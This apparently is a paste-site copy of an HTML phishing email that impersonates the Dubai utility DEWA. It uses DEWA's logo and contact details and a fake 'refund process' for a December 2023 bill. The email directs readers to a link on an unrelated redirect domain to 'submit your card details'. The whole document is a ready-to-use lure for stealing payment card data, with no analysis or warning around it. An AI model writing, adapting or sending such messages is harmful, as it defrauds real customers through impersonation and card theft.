Untitled

 avatar
unknown
plain_text
a year ago
2.3 kB
6
Indexable
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Refund Process Update</title>
    <style>
        body {
            font-family: 'Arial', sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f4f4f4;
        }

        .email-container {
            max-width: 600px;
            margin: 20px auto;
            background-color: #ffffff;
            padding: 20px;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }

        h1 {
            color: #333;
        }

        p {
            color: #555;
            margin-bottom: 15px;
        }

        img {
            max-width: 100%;
            height: auto;
            display: block;
            margin: 0 auto 20px;
        }

        a {
            color: #007BFF;
            text-decoration: none;
        }

        a:hover {
            text-decoration: underline;
        }
    </style>
</head>
<body>
    <div class="email-container">
        <img src="https://www.projexme.com/wp-content/uploads/2017/03/dewa-logo-300x240.jpg" alt="DEWA Logo">
        <p>Dear Customer,</p>
        <p>We hope this message finds you well. We've initiated the refund process for your December 2023 bill on the DEWA website.</p>
        <p>To complete the refund, please <a href="http://post.spmailtechn.com/f/a/wvl_ud9A1x8trEOwgCDxig~~/AAG5FAA~/RgRngXWKP0QlaHR0cHM6Ly9vbGVhc3Rlci5vcmcvd3BmaWxlcy8_cD1RUGF1S1cDc3BjQgplnorwnmUKe_z6UhRlLmFiZGVsYWxpQHNlem5hbS5jelgEAAAAAA~~">click on the following link. </a>To log in to your DEWA account and submit your card details. This ensures a seamless refund process for your convenience.</p>
        <p>If you encounter any issues or have questions, feel free to contact our customer support at <a href="tel:[Customer Service Phone Number]">600 560 000</a> or <a href="mailto:[Your Email Address]">contact@dewa.gov.ae</a>.</p>
        <p>Thank you for choosing DEWA. We value your partnership and look forward to resolving this matter to your satisfaction.</p>
        <p>Best regards,<br>DEWAOFFICIAL © 2024</p>
    </div>
</body>
</html>
Editor is loading...
Leave a Comment